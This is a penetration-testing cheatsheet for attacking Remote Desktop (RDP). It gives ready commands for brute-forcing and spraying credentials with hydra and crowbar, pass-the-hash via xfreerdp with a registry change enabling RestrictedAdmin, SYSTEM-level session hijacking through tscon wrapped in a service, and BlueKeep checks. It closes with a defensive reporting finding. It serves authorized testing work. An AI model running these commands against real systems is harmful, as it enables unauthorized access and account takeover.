π‘οΈ Methodology Checklist
- Detect RDP:
nmap -p 3389 --script rdp-enum-encryption [TARGET] - Brute-force:
hydra -L users.txt -P pass.txt rdp://[TARGET] - BlueKeep (CVE-2019-0708):
nmap --script rdp-vuln-ms12-020 -p 3389 [TARGET] - DejaBlue check (CVE-2019-1181/1182)
- Session hijacking (if SYSTEM):
tscon [SESSION_ID] /dest:[CURRENT_SESSION] - Pass-the-Hash to RDP (Restricted Admin):
xfreerdp /v:[TARGET] /u:[USER] /pth:[HASH] - Check for RDP shadowing for user monitoring
π― Operational Context
Use when: RDP (port 3389) is exposed β brute credentials, check for BlueKeep/DejaBlue, test NLA bypass, or spray with harvested creds.
Think Dumber First: Check nmap --script rdp-enum-encryption [TARGET] for NLA status. NLA enabled = creds required before any exploit. No NLA = BlueKeep-class pre-auth attacks viable. Spray valid AD creds via nxc rdp before manual brute.
Skip when: NLA is enabled and no creds β brute force is slow and loud; prioritize getting creds from another vector.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nmap -Pn -p3389 [TARGET_IP] | Confirm RDP is open |
nmap -p3389 --script rd-vuln-bluekeep [TARGET_IP] | Check for BlueKeep (CVE-2019-0708) |
crowbar -b rdp -s [TARGET_IP]/32 -U [USER_LIST] -c '[PASS]' | RDP password spray (Crowbar β most reliable) |
hydra -L [USER_LIST] -p '[PASS]' [TARGET_IP] rdp | RDP password spray (Hydra β reduce threads with -t 4) |
rdesktop -u [USER] -p [PASS] [TARGET_IP] | Connect via rdesktop |
xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS] | Connect via xfreerdp |
xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH] | RDP Pass-the-Hash (requires RestrictedAdmin mode) |
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f | Enable RestrictedAdmin mode for PtH |
query user | List all active RDP sessions (on target) |
sc.exe create sessionhijack binpath= "cmd.exe /k tscon [SESSION_ID] /dest:[OUR_SESSION]" | Create hijack service |
net start sessionhijack | Execute session hijack (runs as SYSTEM) |
π¬ Deep Dive & Workflow
Password Spraying β Prefer Crowbar Over Hydra for RDP
RDP servers are sensitive to connection concurrency. Crowbar is purpose-built for RDP and handles it more gracefully. Hydra works but needs -t 4 (max 4 threads) and -W (wait between attempts):
crowbar -b rdp -s [TARGET_IP]/32 -U users.txt -c 'Password123!'
hydra -L users.txt -p 'Password123!' [TARGET_IP] rdp -t 4 -WRDP Session Hijacking
If you have Local Administrator privileges on a machine with other usersβ active sessions, you can steal those sessions β including Domain Admin sessions β without knowing their password.
# Step 1: See active sessions
query user
# Output shows SessionName (e.g., rdp-tcp#5), ID (e.g., 2), State
# Step 2: Create a Windows service that runs tscon as SYSTEM
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
# Step 3: Start the service β SYSTEM runs tscon β your screen becomes the victim's
net start sessionhijacktscon is a built-in Windows tool that transfers sessions. The trick is that SYSTEM can move sessions freely, but normal admins cannot β so wrapping it in a service elevates it automatically.
Limitation: Does not work on Windows Server 2019.
RDP Pass-the-Hash
Requires RestrictedAdmin mode on the target (disabled by default). Error βAccount restrictions prevent sign-inβ = RestrictedAdmin is off.
Enable (if you have registry access):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fThen connect with hash:
xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH]BlueKeep (CVE-2019-0708)
Pre-auth RCE via Use-After-Free in RDP kernel driver (LocalSystem). Affects Windows 7 / Server 2008 R2. MSF module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce. Known to cause BSOD β consult client before running in production. Detect safely:
nmap -p3389 --script rd-vuln-bluekeep [TARGET_IP]π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Hydra RDP brute fails | Wrong module or rate limited | Use crowbar -b rdp -s [TARGET]/32 -u [USER] -C pass.txt; or nxc rdp [TARGET] -u users.txt -p pass.txt |
| RDP connection drops immediately | Account locked or NLA rejecting | Verify account not locked: nxc smb [DC] -u [USER] -p [PASS] --pass-pol |
| xfreerdp connection fails | SSL/certificate error | Add /cert:ignore flag: xfreerdp /v:[TARGET] /u:[USER] /p:[PASS] /cert:ignore |
| BlueKeep scanner shows vulnerable but exploit fails | Memory layout varies | BlueKeep (CVE-2019-0708) exploit is unreliable on many patch levels; try manual PoC |
| RDP session drops after 60 seconds | Session timeout GPO | Add keepalive: /timeout:60000 in xfreerdp or configure via Remmina connection settings |
π Reporting Trigger
Finding Title: RDP Exposed Without Network-Level Authentication Impact: RDP without NLA allows pre-authentication attacks (BlueKeep-class) and enables credential brute force without account lockout visibility, providing interactive desktop access when credentials are compromised. Root Cause: RDP enabled on internet-facing or poorly segmented hosts without NLA enforcement. No account lockout threshold or failed authentication alerting. Recommendation: Enable Network Level Authentication (NLA) on all RDP endpoints. Restrict RDP access to management VPN or jump host. Implement account lockout and alert on failed RDP authentication. Apply current Windows security patches.